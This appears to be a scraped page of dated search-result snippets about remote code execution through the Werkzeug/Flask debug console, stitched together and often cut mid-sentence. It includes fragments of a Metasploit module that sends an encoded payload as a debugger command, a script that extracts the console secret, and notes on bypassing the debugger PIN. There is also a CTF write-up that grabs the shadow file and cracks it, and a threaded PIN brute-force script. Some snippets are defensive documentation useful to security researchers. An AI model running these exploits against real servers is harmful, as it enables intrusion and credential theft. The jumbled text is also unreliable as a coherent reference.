fail_with(Failure::UnexpectedReply, 'Werkzeug "Secret" could not be retrieved') unless (match = secret_and_frame) vprint_status "Secret Code: #{match[:secret]}"

December 4, 2022 - 72: '__debugger__' => 'yes', 73: 'cmd' => payload.encoded, 74: 'frm' => '0', 75: 's' => secret 76: } 77: ) 78: else 79: print_error('Secret code not detected.') 80: end 81: end 82: end

October 3, 2018 - You can inject code directly to the application, exposing all data on the server which the application has access to. Both the documentation of Werkzeug and Flask mentions this with large bold letters that you should not expose this debugger online. Now, Werkzeug requires an actual error to trigger the console, as it uses a secret key generated when the application starts, which is only exposed in the Werkzeug Debugger page.

if resp.status_code != 200: print(error_message('Ouups something goes wrong')) sys.exit(1) · if 'Werkzeug powered traceback interpreter' not in resp.text: print(error_message('Werkzeug console not found!')) sys.exit(1) print(success_message('Werkzeug console successfully found!')) · if 'SECRET' not in resp.text: print(error_message('Secret key not found!')) sys.exit(1) secret = re.findall("SECRET = \"([^']{20})", resp.text)[0] print(info_message('Secret Code: {}\n'.format(secret))) ·

October 2, 2015 - Now, Werkzeug requires an actual error to trigger the console, as it uses a secret key generated when the application starts, which is only exposed in the Werkzeug Debugger page. Without this secret key you cannot run any commands, that’s why you need an exception to reveal the secret. Also worth noting is that the debugger only accepts commands sent in by the GET-parameter, which will then show up in access logs on the vulnerable host, which is great for forensic analysis and investigation. Also, each line in the code responds to a frame which is also needed for the debugger to know exactly where in the code to run the command.

Most such environments are production servers, where the debugger should not be enabled anyway. Enable the debugger by wrapping the application with the DebuggedApplication middleware. Alternatively, you can pass use_debugger=True to run_simple() and it will do that for you. class werkzeug.debug.DebuggedApplication(app, evalex=False, request_key='werkzeug.request', console_path='/console', console_init_func=None, show_hidden_frames=False, pin_security=True, pin_logging=True)¶

Werkzeug has a debug console that requires a pin. It's possible to bypass this with an LFI vulnerability or use it as a local privilege escalation vector. - wdahlenburg/werkzeug-debug-console-bypass

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex' class Metasploit4 · secret } ) else print_error('Secret code not detected.') end end end

August 17, 2015 - Werkzeug Debug Shell Command Execution Exploit This module exploits the Werkzeug debug console to put down a Python shell. It is tested against 0.9.6 on Debian, 0.9.6 on Centos, and 0.10 on Debian.

July 20, 2020 - An RCE exploit is discovered with Werkzeug Debugger giving us user. A SUID file is then leveraged with xxd grabbing the shadow file and breaking it with John the Ripper . I started off with two Nmap scans on this machine and stuck with the results from the first scan. My first scan used default scripts -sC and version detection -sV.

August 18, 2015 - Tested against: 0.9.6 on Debian 0.9.6 on Centos 0.10 on Debian }, 'Author' => 'h00die <mike[at]shorebreaksecurity.com>', 'References' => [ ['URL', 'http://werkzeug.pocoo.org/docs/0.10/debug/#enabling-the-debugger'] ], 'License' => MSF_LICENSE, 'Platform' => ['python'], 'Targets' => [[ 'werkzeug 0.10 and older', {}]], 'Arch' => ARCH_PYTHON, 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 28 2015' )) register_options( [ OptString.new('TARGETURI', [true, 'URI to the console', '/console']) ], self.class ) end def check res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(datastore['TAR

""" def __init__(self, namespace): self.console = Console(namespace) self.id = 0 def get_pin_and_cookie_name(app): """Given an application object this returns a semi-stable 9 digit pin code and a random key. The hope is that this is stable between restarts to not make debugging particularly frustrating. If the pin was forcefully disabled this returns `None`. Second item in the resulting tuple is the cookie name for remembering. """ pin = os.environ.get('WERKZEUG_DEBUG_PIN') rv = None num = None # Pin was explicitly disabled if pin == 'off': return None, None # Pin was provided explicitly if pi

April 10, 2023 - First, look for SSTI (server-side template injection) since Flask uses the Jinja2 templating engine. Second, check if the secret key used to sign session cookies is visible anywhere in the source code.

March 11, 2023 - Then you will want to edit the Werkzeug debugger code that generates the pin to output the values of interest. You can edit it by opening venv/lib/python3.11/site-packages/werkzeug/debug/__init__.py in your editor of choice. Then you'll want to scroll down to the line that constructs the private_bits and add the print statements shown below. # This information only exists to make the cookie unique on the # computer, not as a security feature.

May 11, 2021 - Corrected an issue that caused the debugger not to use the machine GUID on POSIX systems. Corrected a Unicode error on Python 3 for the debugger’s PIN usage. Corrected the timestamp verification in the pin debug code. Without this fix the pin was remembered for too long. Released on April 15th 2016. fixed a problem with the machine GUID detection code on OS X on Python 3. Released on April 14th 2016. ... Released on April 14th 2016. werkzeug...

August 18, 2015 - Online Exploit details for "Werkzeug - Debug Shell Command Execution (Metasploit)"

November 21, 2018 - Without this secret key you cannot run any commands, that’s why you need an exception to reveal the secret. Also worth noting is that the debugger only accepts commands sent in by the GET-parameter, which will then show up in access logs on the vulnerable host, which is great for forensic analysis and investigation. Also, each line in the code responds to a frame which is also needed for the debugger to know exactly where in the code to run the command. ... Important: Werkzeug 0.11+ require knowledge of a PIN, after several unsuccessful attempts the debugger will shutdown

These exploits were developed after reviewing Werkzeug source code repo to better understand how the code is generated to then reverse it. The following is the function that generates the pin in Werkzeug from __init__.py. def get_pin_and_cookie_name(app): pin = os.environ.get('WERKZEUG_DEBUG_PIN') rv = None num = None # Pin was explicitly disabled if pin == 'off': return None, None # Pin was provided explicitly if pin is not None and pin.replace('-', '').isdigit(): # If there are separators in the pin, return it directly if '-' in pin: rv = pin else: num = pin modname = getattr(app, '__module__', getattr(app.__class__, '__module__')) try: # `getpass.getuser()` imports the `pwd` module, # which does not exist in the Google App Engine sandbox.

June 21, 2024 - This happens because DebuggedApplication.pin_auth() does not properly handle parallel PIN authentication requests. The app code: import flask app = flask.Flask(__name__) app.debug = True app.run() Program that reproduces the bug (assuming the app above is running on localhost:5000): from threading import Thread from requests import get threads_up = 0 threads_to_start = 150 host = 'http://localhost:5000' response = get(f"{host}/console") secret = response.text.split('SECRET = "')[1] secret = secret.split('"')[0] print("Secret:", secret) wait = True not_exhausted = 0 def send_code(pin): # wait f